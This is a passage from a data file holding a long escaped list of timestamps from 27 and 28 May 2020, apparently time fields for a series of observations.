15:13:41+00:00\",\"2020-05-28 15:23:28+00:00\",\"2020-05-28 15:38:50+00:00\",\"2020-05-28 15:19:07+00:00\",\"2020-05-28 15:28:57+00:00\",\"2020-05-28 15:48:33+00:00\",\"2020-05-28 15:54:01+00:00\",\"2020-05-28 15:03:49+00:00\",\"2020-05-28 15:33:20+00:00\",\"2020-05-28 15:43:13+00:00\",\"2020-05-28 17:03:53+00:00\",\"2020-05-28 17:08:10+00:00\",\"2020-05-28 17:13:29+00:00\",\"2020-05-28 17:18:58+00:00\",\"2020-05-28 17:23:24+00:00\",\"2020-05-28 17:28:52+00:00\",\"2020-05-28 17:33:17+00:00\",\"2020-05-28 05:04:05+00:00\",\"2020-05-28 05:13:40+00:00\",\"2020-05-28 05:19:02+00:00\",\"2020-05-28 05:53:38+00:00\",\"2020-05-28 05:08:21+00:00\",\"2020-05-28 05:33:47+00:00\",\"2020-05-28 05:39:01+00:00\",\"2020-05-28 05:23:21+00:00\",\"2020-05-28 05:28:32+00:00\",\"2020-05-28 05:43:09+00:00\",\"2020-05-28 05:48:30+00:00\",\"2020-05-28 07:04:00+00:00\",\"2020-05-28 07:08:19+00:00\",\"2020-05-28 07:13:47+00:00\",\"2020-05-28 07:18:16+00:00\",\"2020-05-28 07:28:11+00:00\",\"2020-05-28 07:38:48+00:00\",\"2020-05-28 07:44:04+00:00\",\"2020-05-28 07:48:23+00:00\",\"2020-05-28 07:53:42+00:00\",\"2020-05-28 07:23:38+00:00\",\"2020-05-28 07:33:34+00:00\",\"2020-05-28 10:03:26+00:00\",\"2020-05-28 10:13:47+00:00\",\"2020-05-28 10:33:20+00:00\",\"2020-05-28 10:43:37+00:00\",\"2020-05-28 10:48:47+00:00\",\"2020-05-28 10:18:55+00:00\",\"2020-05-28 10:24:04+00:00\",\"2020-05-28 10:38:26+00:00\",\"2020-05-28 10:08:36+00:00\",\"2020-05-28 10:28:08+00:00\",\"2020-05-28 10:53:55+00:00\",\"2020-05-28 08:08:35+00:00\",\"2020-05-28 08:18:16+00:00\",\"2020-05-28 08:28:36+00:00\",\"2020-05-28 08:03:09+00:00\",\"2020-05-28 08:14:03+00:00\",\"2020-05-28 08:33:50+00:00\",\"2020-05-28 08:38:59+00:00\",\"2020-05-28 08:23:31+00:00\",\"2020-05-28 08:43:11+00:00\",\"2020-05-28 08:48:22+00:00\",\"2020-05-28 08:53:40+00:00\",\"2020-05-27 20:18:43+00:00\",\"2020-05-27 20:29:00+00:00\",\"2020-05-27 20:48:38+00:00\",\"2020-05-27 20:04:04+00:00\",\"2020-05-27 20:08:19+00:00\",\"2020-05-27 20:23:50+00:00\",\"2020-05-27 20:38:21+00:00\",\"2020-05-27 20:43:33+00:00\",\"2020-05-27 20:13:35+00:00\",\"2020-05-27 20:33:09+00:00\",\"2020-05-27 20:53:46+00:00\",\"2020-05-28 16:19:02+00:00\",\"2020-05-28 16:53:18+00:00\",\"2020-05-28 16:03:43+00:00\",\"2020-05-28 16:13:39+00:00\",\"2020-05-28 16:28:18+00:00\",\"2020-05-28 16:33:29+00:00\",\"2020-05-28 16:43:54+00:00\",\"2020-05-28 16:48:07+00:00\",\"2020-05-28 16:08:17+00:00\",\"2020-05-28 16:23:11+00:00\",\"2020-05-28 16:38:34+00:00\",\"2020-05-28 12:07:23+00:00\",\"2020-05-28 12:32:23+00:00\",\"2020-05-28 12:47:27+00:00\",\"2020-05-28 12:12:36+00:00\",\"2020-05-28 12:17:47+00:00\",\"2020-05-28 12:41:54+00:00\",\"2020-05-28 12:52:53+00:00\",\"2020-05-28 12:57:12+00:00\",\"2020-05-28 12:22:00+00:00\",\"2020-05-28 12:27:10+00:00\",\"2020-05-28 12:37:36+00:00\",\"2020-05-28 01:17:25+00:00\",\"2020-05-28 01:22:47+00:00\",\"2020-05-28 01:37:49+00:00\",\"2020-05-28 01:42:00+00:00\",\"2020-05-28 01:57:35+00:00\",\"2020-05-28 01:32:27+00:00\",\"2020-05-28 01:52:21+00:00\",\"2020-05-28 01:07:36+00:00\",\"2020-05-28 01:11:56+00:00\",\"2020-05-28 01:27:11+00:00\",\"2020-05-28 01:47:15+00:00\",\"2020-05-27 22:07:14+00:00\",\"2020-05-27 22:37:19+00:00\",\"2020-05-27 22:56:52+00:00\",\"2020-05-27 22:27:51+00:00\",\"2020-05-27 22:46:59+00:00\",\"2020-05-27 22:52:25+00:00\",\"2020-05-27 22:12:17+00:00\",\"2020-05-27 22:17:35+00:00\",\"2020-05-27 22:22:43+00:00\",\"2020-05-27 22:31:56+00:00\",\"2020-05-27 22:42:39+00:00\",\"2020-05-27 18:27:30+00:00\",\"2020-05-27 18:07:55+00:00\",\"2020-05-27 18:17:48+00:00\",\"2020-05-27 18:22:01+00:00\",\"2020-05-27 18:32:54+00:00\",\"2020-05-27 18:37:16+00:00\",\"2020-05-27 18:42:40+00:00\",\"2020-05-27 18:52:33+00:00\",\"2020-05-27 18:12:16+00:00\",\"2020-05-27 18:47:06+00:00\",\"2020-05-27 18:56:59+00:00\",\"2020-05-28 00:07:33+00:00\",\"2020-05-28 00:22:19+00:00\",\"2020-05-28 00:32:00+00:00\",\"2020-05-28 00:37:13+00:00\",\"2020-05-28 00:47:59+00:00\",\"2020-05-28 00:57:43+00:00\",\"2020-05-28 00:12:52+00:00\",\"2020-05-28 00:17:06+00:00\",\"2020-05-28 00:27:43+00:00\",\"2020-05-28 00:42:29+00:00\",\"2020-05-28 00:52:14+00:00\",\"2020-05-28 02:02:46+00:00\",\"2020-05-28 04:02:45+00:00\",\"2020-05-28 14:07:14+00:00\",\"2020-05-28 14:17:06+00:00\",\"2020-05-28 14:57:22+00:00\",\"2020-05-28 14:12:41+00:00\",\"2020-05-28 14:22:28+00:00\",\"2020-05-28 14:27:53+00:00\",\"2020-05-28 14:32:13+00:00\",\"2020-05-28 14:37:44+00:00\",\"2020-05-28 14:42:06+00:00\",\"2020-05-28 14:47:29+00:00\",\"2020-05-28 14:52:00+00:00\",\"2020-05-28 16:22:12+00:00\",\"2020-05-28 16:12:37+00:00\",\"2020-05-28 16:37:45+00:00\",\"2020-05-28 16:42:59+00:00\",\"2020-05-28 16:47:12+00:00\",\"2020-05-28 16:52:20+00:00\",\"2020-05-28 16:57:37+00:00\",\"2020-05-28 16:07:10+00:00\",\"2020-05-28 16:16:56+00:00\",\"2020-05-28 16:27:21+00:00\",\"2020-05-28 16:32:38+00:00\",\"2020-05-27 21:27:05+00:00\",\"2020-05-27 21:47:37+00:00\",\"2020-05-27 21:52:39+00:00\",\"2020-05-27 21:07:17+00:00\",\"2020-05-27 21:12:27+00:00\",\"2020-05-27 21:22:50+00:00\",\"2020-05-27 21:17:40+00:00\",\"2020-05-27 21:32:07+00:00\",\"2020-05-27 21:37:16+00:00\",\"2020-05-27 21:42:25+00:00\",\"2020-05-27 21:58:00+00:00\",\"2020-05-27 19:12:15+00:00\",\"2020-05-27 19:22:06+00:00\",\"2020-05-27 19:32:00+00:00\",\"2020-05-27 19:37:20+00:00\",\"2020-05-27 19:07:53+00:00\",\"2020-05-27 19:42:37+00:00\",\"2020-05-27 19:17:51+00:00\",\"2020-05-27 19:27:31+00:00\",\"2020-05-27 19:47:54+00:00\",\"2020-05-27 19:52:13+00:00\",\"2020-05-27 19:57:53+00:00\",\"2020-05-28 02:17:20+00:00\",\"2020-05-28 02:22:21+00:00\",\"2020-05-28 02:07:53+00:00\",\"2020-05-28 02:12:08+00:00\",\"2020-05-28 02:27:28+00:00\",\"2020-05-28 02:32:38+00:00\",\"2020-05-28 02:37:47+00:00\",\"2020-05-28 02:41:59+00:00\",\"2020-05-28 02:47:18+00:00\",\"2020-05-28 02:52:14+00:00\",\"2020-05-28 02:57:22+00:00\",\"2020-05-28 13:12:35+00:00\",\"2020-05-28 13:27:52+00:00\",\"2020-05-28 13:42:05+00:00\",\"2020-05-28 13:51:55+00:00\",\"2020-05-28 13:57:21+00:00\",\"2020-05-28 13:07:18+00:00\",\"2020-05-28 13:17:03+00:00\",\"2020-05-28 13:37:38+00:00\",\"2020-05-28 13:22:28+00:00\",\"2020-05-28 13:32:13+00:00\",\"2020-05-28 13:47:31+00:00\",\"2020-05-28 10:07:34+00:00\",\"2020-05-28 10:12:49+00:00\",\"2020-05-28 10:27:16+00:00\",\"2020-05-28 10:18:00+00:00\",\"2020-05-28 10:57:10+00:00\",\"2020-05-28 10:22:07+00:00\",\"2020-05-28 10:32:20+00:00\",\"2020-05-28 10:37:28+00:00\",\"2020-05-28 10:42:48+00:00\",\"2020-05-28 10:47:52+00:00\",\"2020-05-28 10:52:58+00:00\",\"2020-05-27 20:07:26+00:00\",\"2020-05-27 20:27:08+00:00\",\"2020-05-27 20:32:13+00:00\",\"2020-05-27 20:37:21+00:00\",\"2020-05-27 20:57:02+00:00\",\"2020-05-27 20:17:49+00:00\",\"2020-05-27 20:22:58+00:00\",\"2020-05-27 20:52:49+00:00\",\"2020-05-27 20:12:43+00:00\",\"2020-05-27 20:42:34+00:00\",\"2020-05-27 20:47:44+00:00\",\"2020-05-28 09:12:53+00:00\",\"2020-05-28 09:27:28+00:00\",\"2020-05-28 09:37:46+00:00\",\"2020-05-28 09:42:54+00:00\",\"2020-05-28 09:52:15+00:00\",\"2020-05-28 09:57:21+00:00\",\"2020-05-28 09:22:12+00:00\",\"2020-05-28 09:32:40+00:00\",\"2020-05-28 09:07:50+00:00\",\"2020-05-28 09:17:05+00:00\",\"2020-05-28 09:47:01+00:00\",\"2020-05-28 17:07:11+00:00\",\"2020-05-28 17:22:26+00:00\",\"2020-05-28 17:37:49+00:00\",\"2020-05-28 17:32:14+00:00\",\"2020-05-28 17:12:31+00:00\",\"2020-05-28 17:16:56+00:00\",\"2020-05-28 17:27:49+00:00\",\"2020-05-28 04:17:15+00:00\",\"2020-05-28 04:37:09+00:00\",\"2020-05-28 04:42:33+00:00\",\"2020-05-28 04:57:54+00:00\",\"2020-05-28 04:22:24+00:00\",\"2020-05-28 04:07:56+00:00\",\"2020-05-28 04:12:06+00:00\",\"2020-05-28 04:27:40+00:00\",\"2020-05-28 04:32:56+00:00\",\"2020-05-28 04:47:57+00:00\",\"2020-05-28 04:52:16+00:00\",\"2020-05-28 07:07:15+00:00\",\"2020-05-28 07:12:48+00:00\",\"2020-05-28 07:27:04+00:00\",\"2020-05-28 07:32:32+00:00\",\"2020-05-28 07:52:50+00:00\",\"2020-05-28 07:17:10+00:00\",\"2020-05-28 07:37:55+00:00\",\"2020-05-28 07:47:28+00:00\",\"2020-05-28 07:22:39+00:00\",\"2020-05-28 07:42:07+00:00\",\"2020-05-28 07:56:53+00:00\",\"2020-05-27 17:56:58+00:00\",\"2020-05-28 15:07:14+00:00\",\"2020-05-28 15:28:01+00:00\",\"2020-05-28 15:42:05+00:00\",\"2020-05-28 15:17:05+00:00\",\"2020-05-28 15:22:32+00:00\",\"2020-05-28 15:12:37+00:00\",\"2020-05-28 15:32:15+00:00\",\"2020-05-28 15:37:41+00:00\",\"2020-05-28 15:47:31+00:00\",\"2020-05-28 15:51:57+00:00\",\"2020-05-28 15:57:18+00:00\",\"2020-05-28 11:17:44+00:00\",\"2020-05-28 11:32:09+00:00\",\"2020-05-28 11:52:57+00:00\",\"2020-05-28 11:12:36+00:00\",\"2020-05-28 11:42:40+00:00\",\"2020-05-28 11:57:05+00:00\",\"2020-05-28 11:07:28+00:00\",\"2020-05-28 11:22:55+00:00\",\"2020-05-28 11:27:00+00:00\",\"2020-05-28 11:37:27+00:00\",\"2020-05-28 11:47:46+00:00\",\"2020-05-28 06:07:08+00:00\",\"2020-05-28 06:12:27+00:00\",\"2020-05-28 06:18:00+00:00\",\"2020-05-28 06:27:51+00:00\",\"2020-05-28 06:42:24+00:00\",\"2020-05-28 06:22:23+00:00\",\"2020-05-28 06:31:57+00:00\",\"2020-05-28 06:37:12+00:00\",\"2020-05-28 06:51:59+00:00\",\"2020-05-28 06:47:52+00:00\",\"2020-05-28 06:57:29+00:00\",\"2020-05-28 05:07:26+00:00\",\"2020-05-28 05:12:42+00:00\",\"2020-05-28 05:47:31+00:00\",\"2020-05-28 05:32:47+00:00\",\"2020-05-28 05:37:53+00:00\",\"2020-05-28 05:16:51+00:00\",\"2020-05-28 05:22:13+00:00\",\"2020-05-28 05:27:33+00:00\",\"2020-05-28 05:42:06+00:00\",\"2020-05-28 05:52:37+00:00\",\"2020-05-28 05:57:53+00:00\",\"2020-05-28 03:07:44+00:00\",\"2020-05-28 03:17:02+00:00\",\"2020-05-28 03:22:10+00:00\",\"2020-05-28 03:32:29+00:00\",\"2020-05-28 03:46:56+00:00\",\"2020-05-28 03:52:07+00:00\",\"2020-05-28 03:12:51+00:00\",\"2020-05-28 03:27:20+00:00\",\"2020-05-28 03:37:44+00:00\",\"2020-05-28 03:42:51+00:00\",\"2020-05-28 03:57:36+00:00\",\"2020-05-27 23:27:01+00:00\",\"2020-05-27 23:32:12+00:00\",\"2020-05-27 23:37:23+00:00\",\"2020-05-27 23:42:37+00:00\",\"2020-05-27 23:52:32+00:00\",\"2020-05-27 23:56:55+00:00\",\"2020-05-27 23:22:48+00:00\",\"2020-05-27 23:07:48+00:00\",\"2020-05-27 23:12:11+00:00\",\"2020-05-27 23:17:19+00:00\",\"2020-05-27 23:47:00+00:00\",\"2020-05-28 08:07:38+00:00\",\"2020-05-28 08:12:57+00:00\",\"2020-05-28 08:22:40+00:00\",\"2020-05-28 08:27:49+00:00\",\"2020-05-28 08:47:23+00:00\",\"2020-05-28 08:57:01+00:00\",\"2020-05-28 08:17:24+00:00\",\"2020-05-28 08:32:53+00:00\",\"2020-05-28 08:42:20+00:00\",\"2020-05-28 08:37:02+00:00\",\"2020-05-28 08:52:47+00:00\",\"2020-05-27 19:41:28+00:00\",\"2020-05-27 19:45:44+00:00\",\"2020-05-27 19:50:48+00:00\",\"2020-05-27 19:55:55+00:00\",\"2020-05-27 20:01:00+00:00\",\"2020-05-27 20:05:50+00:00\",\"2020-05-27 20:10:54+00:00\",\"2020-05-27 20:15:53+00:00\",\"2020-05-27 20:21:35+00:00\",\"2020-05-27 20:26:05+00:00\",\"2020-05-27 20:30:58+00:00\",\"2020-05-28 04:40:49+00:00\",\"2020-05-28 04:45:59+00:00\",\"2020-05-28 04:51:03+00:00\",\"2020-05-28 04:56:01+00:00\",\"2020-05-28 05:00:50+00:00\",\"2020-05-28 05:05:49+00:00\",\"2020-05-28 05:11:11+00:00\",\"2020-05-28 05:15:44+00:00\",\"2020-05-28 05:20:47+00:00\",\"2020-05-28 05:26:31+00:00\",\"2020-05-28 05:31:27+00:00\",\"2020-05-28 01:40:46+00:00\",\"2020-05-28 01:45:32+00:00\",\"2020-05-28 01:50:38+00:00\",\"2020-05-28 01:55:46+00:00\",\"2020-05-28 02:01:01+00:00\",\"2020-05-28 02:05:30+00:00\",\"2020-05-28 02:10:29+00:00\",\"2020-05-28 02:15:43+00:00\",\"2020-05-28 02:20:34+00:00\",\"2020-05-28 02:25:31+00:00\",\"2020-05-28 02:30:48+00:00\",\"2020-05-28 10:46:38+00:00\",\"2020-05-28 10:50:15+00:00\",\"2020-05-28 10:55:48+00:00\",\"2020-05-28 11:00:33+00:00\",\"2020-05-28 11:05:36+00:00\",\"2020-05-28 11:10:31+00:00\",\"2020-05-28 11:15:49+00:00\",\"2020-05-28 11:21:06+00:00\",\"2020-05-28 11:26:27+00:00\",\"2020-05-28 11:30:38+00:00\",\"2020-05-28 11:35:44+00:00\",\"2020-05-28 11:40:44+00:00\",\"2020-05-27 23:41:05+00:00\",\"2020-05-27 23:46:16+00:00\",\"2020-05-27 23:51:55+00:00\",\"2020-05-27 23:56:08+00:00\",\"2020-05-28 00:01:51+00:00\",\"2020-05-28 00:06:33+00:00\",\"2020-05-28 00:11:24+00:00\",\"2020-05-28 00:15:10+00:00\",\"2020-05-28 00:20:06+00:00\",\"2020-05-28 00:25:21+00:00\",\"2020-05-28 00:30:14+00:00\",\"2020-05-28 09:50:13+00:00\",\"2020-05-28 09:56:20+00:00\",\"2020-05-28 10:01:26+00:00\",\"2020-05-28 10:06:49+00:00\",\"2020-05-28 10:10:22+00:00\",\"2020-05-28 10:15:38+00:00\",\"2020-05-28 10:20:19+00:00\",\"2020-05-28 10:26:47+00:00\",\"2020-05-28 10:30:19+00:00\",\"2020-05-28 10:35:15+00:00\",\"2020-05-28 10:40:42+00:00\",\"2020-05-28 15:51:02+00:00\",\"2020-05-28 15:56:16+00:00\",\"2020-05-28 16:01:14+00:00\",\"2020-05-28 16:05:53+00:00\",\"2020-05-28 16:11:23+00:00\",\"2020-05-28 16:15:49+00:00\",\"2020-05-28 16:22:03+00:00\",\"2020-05-28 16:25:48+00:00\",\"2020-05-28 16:30:54+00:00\",\"2020-05-28 16:35:58+00:00\",\"2020-05-28 16:42:16+00:00\",\"2020-05-28 07:46:38+00:00\",\"2020-05-28 07:51:46+00:00\",\"2020-05-28 07:56:16+00:00\",\"2020-05-28 08:01:24+00:00\",\"2020-05-28 08:06:36+00:00\",\"2020-05-28 08:10:59+00:00\",\"2020-05-28 08:16:39+00:00\",\"2020-05-28 08:21:01+00:00\",\"2020-05-28 08:26:02+00:00\",\"2020-05-28 08:31:24+00:00\",\"2020-05-28 08:36:21+00:00\",\"2020-05-28 08:41:28+00:00\",\"2020-05-27 21:41:11+00:00\",\"2020-05-27 21:45:57+00:00\",\"2020-05-27 21:50:56+00:00\",\"2020-05-27 21:55:58+00:00\",\"2020-05-27 22:00:58+00:00\",\"2020-05-27 22:06:23+00:00\",\"2020-05-27 22:11:35+00:00\",\"2020-05-27 22:16:23+00:00\",\"2020-05-27 22:21:34+00:00\",\"2020-05-27 22:26:29+00:00\",\"2020-05-27 22:31:10+00:00\",\"2020-05-27 18:00:50+00:00\",\"2020-05-27 18:05:56+00:00\",\"2020-05-27 18:11:08+00:00\",\"2020-05-27 18:16:08+00:00\",\"2020-05-27 18:21:30+00:00\",\"2020-05-27 18:26:07+00:00\",\"2020-05-27 18:30:47+00:00\",\"2020-05-28 14:45:55+00:00\",\"2020-05-28 14:50:54+00:00\",\"2020-05-28 14:56:13+00:00\",\"2020-05-28 15:01:47+00:00\",\"2020-05-28 15:05:48+00:00\",\"2020-05-28 15:10:40+00:00\",\"2020-05-28 15:16:16+00:00\",\"2020-05-28 15:22:14+00:00\",\"2020-05-28 15:25:51+00:00\",\"2020-05-28 15:31:04+00:00\",\"2020-05-28 15:35:41+00:00\",\"2020-05-28 15:41:51+00:00\",\"2020-05-28 05:40:44+00:00\",\"2020-05-28 05:46:03+00:00\",\"2020-05-28 05:51:29+00:00\",\"2020-05-28 05:55:51+00:00\",\"2020-05-28 06:01:23+00:00\",\"2020-05-28 06:06:10+00:00\",\"2020-05-28 06:10:50+00:00\",\"2020-05-28 06:15:56+00:00\",\"2020-05-28 06:21:07+00:00\",\"2020-05-28 06:25:58+00:00\",\"2020-05-28 11:50:30+00:00\",\"2020-05-28 11:55:26+00:00\",\"2020-05-28 12:00:36+00:00\",\"2020-05-28 12:05:59+00:00\",\"2020-05-28 12:10:43+00:00\",\"2020-05-28 12:15:25+00:00\",\"2020-05-28 12:21:13+00:00\",\"2020-05-28 12:26:16+00:00\",\"2020-05-28 12:30:43+00:00\",\"2020-05-28 12:35:37+00:00\",\"2020-05-28 12:40:38+00:00\",\"2020-05-27 20:41:05+00:00\",\"2020-05-27 20:46:17+00:00\",\"2020-05-27 20:50:51+00:00\",\"2020-05-27 20:56:31+00:00\",\"2020-05-27 21:01:08+00:00\",\"2020-05-27 21:06:26+00:00\",\"2020-05-27 21:10:57+00:00\",\"2020-05-27 21:16:19+00:00\",\"2020-05-27 21:21:30+00:00\",\"2020-05-27 21:26:40+00:00\",\"2020-05-27 21:31:03+00:00\",\"2020-05-28 13:50:56+00:00\",\"2020-05-28 13:57:04+00:00\",\"2020-05-28 14:01:09+00:00\",\"2020-05-28 14:06:08+00:00\",\"2020-05-28 14:10:51+00:00\",\"2020-05-28 14:15:44+00:00\",\"2020-05-28 14:20:41+00:00\",\"2020-05-28 14:25:53+00:00\",\"2020-05-28 14:31:17+00:00\",\"2020-05-28 14:35:50+00:00\",\"2020-05-28 14:40:36+00:00\",\"2020-05-27 18:40:47+00:00\",\"2020-05-27 18:46:04+00:00\",\"2020-05-27 18:50:43+00:00\",\"2020-05-27 18:55:39+00:00\",\"2020-05-27 19:01:18+00:00\",\"2020-05-27 19:06:23+00:00\",\"2020-05-27 19:11:28+00:00\",\"2020-05-27 19:16:05+00:00\",\"2020-05-27 19:20:40+00:00\",\"2020-05-27 19:26:17+00:00\",\"2020-05-27 19:30:43+00:00\",\"2020-05-27 22:41:03+00:00\",\"2020-05-27 22:46:04+00:00\",\"2020-05-27 22:51:16+00:00\",\"2020-05-27 22:56:43+00:00\",\"2020-05-27 23:01:12+00:00\",\"2020-05-27 23:06:06+00:00\",\"2020-05-27 23:11:35+00:00\",\"2020-05-27 23:16:17+00:00\",\"2020-05-27 23:21:20+00:00\",\"2020-05-27 23:26:27+00:00\",\"2020-05-27 23:31:04+00:00\",\"2020-05-28 02:40:32+00:00\",\"2020-05-28 02:45:44+00:00\",\"2020-05-28 02:50:39+00:00\",\"2020-05-28 02:56:09+00:00\",\"2020-05-28 03:00:57+00:00\",\"2020-05-28 03:05:39+00:00\",\"2020-05-28 03:10:45+00:00\",\"2020-05-28 03:15:39+00:00\",\"2020-05-28 03:20:31+00:00\",\"2020-05-28 03:25:59+00:00\",\"2020-05-28 03:30:51+00:00\",\"2020-05-28 12:50:33+00:00\",\"2020-05-28 12:55:31+00:00\",\"2020-05-28 13:01:44+00:00\",\"2020-05-28 13:05:59+00:00\",\"2020-05-28 13:10:45+00:00\",\"2020-05-28 13:15:57+00:00\",\"2020-05-28 13:20:40+00:00\",\"2020-05-28 13:26:11+00:00\",\"2020-05-28 13:30:38+00:00\",\"2020-05-28 13:36:00+00:00\",\"2020-05-28 13:40:40+00:00\",\"2020-05-28 16:47:14+00:00\",\"2020-05-28 16:51:20+00:00\",\"2020-05-28 16:56:03+00:00\",\"2020-05-28 17:01:02+00:00\",\"2020-05-28 17:06:47+00:00\",\"2020-05-28 17:10:50+00:00\",\"2020-05-28 17:15:53+00:00\",\"2020-05-28 17:21:07+00:00\",\"2020-05-28 17:26:06+00:00\",\"2020-05-28 17:32:22+00:00\",\"2020-05-28 17:37:06+00:00\",\"2020-05-28 07:22:16+00:00\",\"2020-05-28 07:26:19+00:00\",\"2020-05-28 07:28:22+00:00\",\"2020-05-28 07:31:19+00:00\",\"2020-05-28 07:36:14+00:00\",\"2020-05-28 07:41:35+00:00\",\"2020-05-28 08:46:21+00:00\",\"2020-05-28 08:51:34+00:00\",\"2020-05-28 08:56:09+00:00\",\"2020-05-28 09:01:39+00:00\",\"2020-05-28 09:06:33+00:00\",\"2020-05-28 09:11:20+00:00\",\"2020-05-28 09:16:26+00:00\",\"2020-05-28 09:21:13+00:00\",\"2020-05-28 09:26:09+00:00\",\"2020-05-28 09:31:36+00:00\",\"2020-05-28 09:36:20+00:00\",\"2020-05-28 09:41:33+00:00\",\"2020-05-28 00:40:41+00:00\",\"2020-05-28 00:45:13+00:00\",\"2020-05-28 00:50:18+00:00\",\"2020-05-28 00:55:28+00:00\",\"2020-05-28 01:00:20+00:00\",\"2020-05-28 01:05:18+00:00\",\"2020-05-28 01:10:32+00:00\",\"2020-05-28 01:15:56+00:00\",\"2020-05-28 01:20:15+00:00\",\"2020-05-28 01:25:46+00:00\",\"2020-05-28 01:30:33+00:00\",\"2020-05-28 03:41:05+00:00\",\"2020-05-28 03:45:48+00:00\",\"2020-05-28 03:50:40+00:00\",\"2020-05-28 03:55:50+00:00\",\"2020-05-28 04:00:57+00:00\",\"2020-05-28 04:05:41+00:00\",\"2020-05-28 04:11:16+00:00\",\"2020-05-28 04:15:54+00:00\",\"2020-05-28 04:20:56+00:00\",\"2020-05-28 04:25:45+00:00\",\"2020-05-28 04:30:48+00:00\",\"2020-05-28 11:32:26+00:00\",\"2020-05-28 11:37:49+00:00\",\"2020-05-28 11:42:44+00:00\",\"2020-05-28 11:47:49+00:00\",\"2020-05-28 11:51:41+00:00\",\"2020-05-28 11:56:21+00:00\",\"2020-05-28 12:04:36+00:00\",\"2020-05-28 12:06:40+00:00\",\"2020-05-28 12:11:20+00:00\",\"2020-05-28 12:16:31+00:00\",\"2020-05-28 12:26:14+00:00\",\"2020-05-27 21:26:58+00:00\",\"2020-05-27 21:32:03+00:00\",\"2020-05-27 21:37:06+00:00\",\"2020-05-27 21:42:25+00:00\",\"2020-05-27 21:47:18+00:00\",\"2020-05-27 21:52:27+00:00\",\"2020-05-27 21:57:31+00:00\",\"2020-05-27 22:02:01+00:00\",\"2020-05-27 22:07:23+00:00\",\"2020-05-27 22:12:13+00:00\",\"2020-05-27 22:17:14+00:00\",\"2020-05-28 01:27:24+00:00\",\"2020-05-28 01:32:17+00:00\",\"2020-05-28 01:37:37+00:00\",\"2020-05-28 01:42:34+00:00\",\"2020-05-28 01:47:51+00:00\",\"2020-05-28 01:53:00+00:00\",\"2020-05-28 01:57:46+00:00\",\"2020-05-28 02:01:48+00:00\",\"2020-05-28 02:06:34+00:00\",\"2020-05-28 02:12:02+00:00\",\"2020-05-28 02:16:44+00:00\",\"2020-05-28 14:32:15+00:00\",\"2020-05-28 14:37:51+00:00\",\"2020-05-28 14:41:47+00:00\",\"2020-05-28 14:46:49+00:00\",\"2020-05-28 14:51:40+00:00\",\"2020-05-28 14:58:13+00:00\",\"2020-05-28 15:01:49+00:00\",\"2020-05-28 15:06:52+00:00\",\"2020-05-28 15:11:51+00:00\",\"2020-05-28 15:16:36+00:00\",\"2020-05-28 15:22:16+00:00\",\"2020-05-28 15:26:40+00:00\",\"2020-05-28 00:27:15+00:00\",\"2020-05-28 00:32:42+00:00\",\"2020-05-28 00:37:30+00:00\",\"2020-05-28 00:42:10+00:00\",\"2020-05-28 00:47:27+00:00\",\"2020-05-28 00:52:34+00:00\",\"2020-05-28 00:57:31+00:00\",\"2020-05-28 01:02:29+00:00\",\"2020-05-28 01:07:39+00:00\",\"2020-05-28 01:12:23+00:00\",\"2020-05-28 01:17:35+00:00\",\"2020-05-27 18:26:48+00:00\",\"2020-05-27 18:31:39+00:00\",\"2020-05-27 18:36:50+00:00\",\"2020-05-27 18:42:05+00:00\",\"2020-05-27 18:47:01+00:00\",\"2020-05-27 18:51:41+00:00\",\"2020-05-27 18:57:28+00:00\",\"2020-05-27 19:02:27+00:00\",\"2020-05-27 19:07:11+00:00\",\"2020-05-27 19:12:04+00:00\",\"2020-05-27 19:16:49+00:00\",\"2020-05-27 19:22:20+00:00\",\"2020-05-27 19:27:10+00:00\",\"2020-05-27 19:31:52+00:00\",\"2020-05-27 19:36:43+00:00\",\"2020-05-27 19:42:07+00:00\",\"2020-05-27 19:47:25+00:00\",\"2020-05-27 19:51:48+00:00\",\"2020-05-27 19:57:00+00:00\",\"2020-05-27 20:01:59+00:00\",\"2020-05-27 20:07:02+00:00\",\"2020-05-27 20:12:13+00:00\",\"2020-05-27 20:16:54+00:00\",\"2020-05-28 07:28:20+00:00\",\"2020-05-28 07:32:17+00:00\",\"2020-05-28 07:36:54+00:00\",\"2020-05-28 07:42:10+00:00\",\"2020-05-28 07:47:44+00:00\",\"2020-05-28 07:52:47+00:00\",\"2020-05-28 07:57:28+00:00\",\"2020-05-28 08:03:24+00:00\",\"2020-05-28 08:06:59+00:00\",\"2020-05-28 08:12:32+00:00\",\"2020-05-28 08:17:04+00:00\",\"2020-05-28 08:22:15+00:00\",\"2020-05-28 04:26:45+00:00\",\"2020-05-28 04:31:41+00:00\",\"2020-05-28 04:37:08+00:00\",\"2020-05-28 04:41:39+00:00\",\"2020-05-28 04:46:39+00:00\",\"2020-05-28 04:51:54+00:00\",\"2020-05-28 04:56:51+00:00\",\"2020-05-28 05:02:03+00:00\",\"2020-05-28 05:06:56+00:00\",\"2020-05-28 05:11:52+00:00\",\"2020-05-28 05:17:07+00:00\",\"2020-05-27 23:27:10+00:00\",\"2020-05-27 23:32:15+00:00\",\"2020-05-27 23:37:12+00:00\",\"2020-05-27 23:42:15+00:00\",\"2020-05-27 23:47:35+00:00\",\"2020-05-27 23:52:43+00:00\",\"2020-05-27 23:57:15+00:00\",\"2020-05-28 00:02:06+00:00\",\"2020-05-28 00:07:56+00:00\",\"2020-05-28 00:12:16+00:00\",\"2020-05-28 00:17:56+00:00\",\"2020-05-27 22:27:11+00:00\",\"2020-05-27 22:32:39+00:00\",\"2020-05-27 22:37:03+00:00\",\"2020-05-27 22:42:01+00:00\",\"2020-05-27 22:47:18+00:00\",\"2020-05-27 22:52:14+00:00\",\"2020-05-27 22:57:06+00:00\",\"2020-05-27 23:02:26+00:00\",\"2020-05-27 23:07:33+00:00\",\"2020-05-27 23:12:35+00:00\",\"2020-05-27 23:17:01+00:00\",\"2020-05-28 02:26:22+00:00\",\"2020-05-28 02:31:22+00:00\",\"2020-05-28 02:37:03+00:00\",\"2020-05-28 02:41:40+00:00\",\"2020-05-28 02:46:40+00:00\",\"2020-05-28 02:51:58+00:00\",\"2020-05-28 02:56:54+00:00\",\"2020-05-28 03:02:16+00:00\",\"2020-05-28 03:06:59+00:00\",\"2020-05-28 03:11:58+00:00\",\"2020-05-28 03:17:05+00:00\",\"2020-05-27 20:22:06+00:00\",\"2020-05-27 20:26:50+00:00\",\"2020-05-27 20:32:25+00:00\",\"2020-05-27 20:37:04+00:00\",\"2020-05-27 20:42:05+00:00\",\"2020-05-27 20:47:04+00:00\",\"2020-05-27 20:52:35+00:00\",\"2020-05-27 20:57:02+00:00\",\"2020-05-27 21:02:08+00:00\",\"2020-05-27 21:07:00+00:00\",\"2020-05-27 21:12:20+00:00\",\"2020-05-27 